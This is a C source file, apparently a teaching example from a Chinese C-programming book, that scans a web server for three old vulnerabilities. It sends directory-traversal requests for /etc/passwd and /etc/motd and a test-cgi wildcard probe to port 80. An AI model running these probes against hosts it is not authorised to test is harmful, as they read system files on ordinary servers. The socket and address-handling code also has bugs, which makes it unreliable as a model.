51.c

来自「C语言实战105例的光盘所附程序」· C语言 代码 · 共 62 行

#include <string.h>
#include <stdio.h> 
#include <stdlib.h> 
#include <sys/types.h> 
#include <sys/param.h> 
#include <sys/ioctl.h> 
#include <sys/socket.h> 
#include <net/if.h> 
#include <netinet/in.h> 
#include <net/if_arp.h> 
#define BUFFSIZE 1024
/*定义要检测的漏洞数*/
#define MAXHOLE  3
int main(int argc,char *argv[]) 
{ 
	struct sockaddr_in address; 
	struct hostent *he = (struct hostent *)malloc( sizeof( struct hostent )); 
	int i; 
	int sockfd; 
	char buff[BUFFSIZE]; 
	char *fmt="HTTP/1.1 200 OK";
	/*定义了指针数组来存放漏洞*/
	char *hole[MAXHOLE]; 
	hole[0]="GET /../../../../etc/passwd HTTP/1.0\n\n"; 
	hole[1]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n"; 
	hole[2]="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n"; 
	 
	if(argc!=2)
	{ 
		printf("Please input the IP address\n"); 
		return 0; 
	} 
	
	/*获得一个用于通信的套接字*/
	sockfd=socket(AF_INET,SOCK_STREAM,0); 
	address.sin_family=AF_INET; 
	address.sin_port=htons(80); 
	address.sin_addr.s_addr=inet_addr(argv[1]); 
	if ((he=gethostbyname(argv[1]))!=0) 
			//memcpy( (char *)&(address.sin_addr.s_addr) , he->h_addr,he->h_length); 
			address.sin_addr.s_addr=*((struct sockaddr_in *)(he->h_addr));
			
	if((address.sin_addr.s_addr=inet_addr(argv[1]))==-1) 
		return 0; 
	/*依次检测各个漏洞*/
	for (i=0;i<MAXHOLE;i++) 
	{ 
		if (connect(sockfd,(struct sockaddr*)&address,sizeof(address))==0)
		{ 
			send(sockfd,hole[i],strlen(hole[i]),0); 
			recv(sockfd,buff,sizeof(buff),0); 
			if(strstr(buff,fmt)!=NULL)
				printf("\nFound :%s\n", hole[i]);
		} 
	} 
	/*关闭套接字*/
	close(sockfd); 
	return 0; 
}